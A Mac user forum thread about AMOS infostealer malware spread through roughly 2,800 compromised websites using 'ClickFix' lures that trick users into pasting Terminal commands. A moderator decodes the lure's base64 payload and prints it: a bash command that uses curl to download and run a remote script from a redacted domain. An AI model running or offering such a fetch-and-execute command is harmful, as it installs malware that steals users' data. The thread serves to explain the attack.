MacReaper - Have you hear about this?

lclev

lclev


Joined
Jul 24, 2013
Messages
5,150
Reaction score
938
Points
113
Location
Ohio (USA)
Your Mac's Specs
2023-14" M3max MBPro, 64GB/1TB, iPhone 16 Pro Max, Watch Ultra & S10
Randy B. Singer

Randy B. Singer


Joined
Feb 1, 2011
Messages
4,953
Reaction score
2,980
Points
113
Location
Sacramento, California
lclev said:
Over 2,800 websites used to spread AMOS stealer malware - CyberGuy

I do think most would realize there was a problem once the malware required terminal access. Unfortunately some might not understand this, but if they don't I can't imagine someone using terminal who has limited skills.
Click to expand...

I think that experienced Mac users would know better than to fall for this, and that inexperienced users would be too afraid of the Terminal to attempt it. I don't know who that leaves. It's hard to take this seriously. It almost sounds like an April Fools joke.

The site that you linked to is obviously run by Windows bigots who want us to believe that our Macs are just as insecure as their Windows POS's. They, too, are hard to take seriously.
 
Raz0rEdge

Raz0rEdge

Well-known member
Staff member
Moderator
Joined
Jul 17, 2009
Messages
16,081
Reaction score
2,505
Points
113
Location
MA
Your Mac's Specs
2022 Mac Studio M1 Max, 2023 M2 MBA
Quite interesting, that particular base64 string decodes to the following
/bin/bash "$(curl -fsSL https://<bad domain>/2/perify.sh)"
Click to expand...
So when you pipe that to the shell, it'll just execute that shell script.

The arguments to Curl are fail fast, silent, Show errors, and follow redirect links.
 
B

badbyte

New member
Joined
May 14, 2025
Messages
1
Reaction score
1
Points
3
Randy B. Singer said:
I think that experienced Mac users would know better than to fall for this, and that inexperienced users would be too afraid of the Terminal to attempt it. I don't know who that leaves. It's hard to take this seriously. It almost sounds like an April Fools joke.

The site that you linked to is obviously run by Windows bigots who want us to believe that our Macs are just as insecure as their Windows POS's. They, too, are hard to take seriously.
Click to expand...
Unfortunately, ClickFix has become a widely used delivery method, primarily for infostealers, since mid-2024. Its use has been significantly increasing for one key reason: it is effective.

I am the researcher who uncovered the approximately 2,800 compromised sites, and I can confirm that macOS is being widely targeted by infostealer malware. However, I acknowledge that Windows remains the number one targeted platform.

More of my research can be found here:
https://badbyte.io/infostealer-macos-etherhiding/
 
Rod

Rod


Joined
Jun 12, 2011
Messages
10,642
Reaction score
2,658
Points
113
Location
Melbourne, Australia and Ubud, Bali, Indonesia
Your Mac's Specs
2021 M1 MacBook Pro 14" macOS 14.5 Mid 2010MacBook 13" iPhone 13 Pro max, iPad 6, Apple Watch SE.
Good read, thank you.
 

Shop Amazon


Shop for your Apple, Mac, iPhone and other computer products on Amazon.
We are a participant in the Amazon Services LLC Associates Program, an affiliate program designed to provide a means for us to earn fees by linking to Amazon and affiliated sites.
Top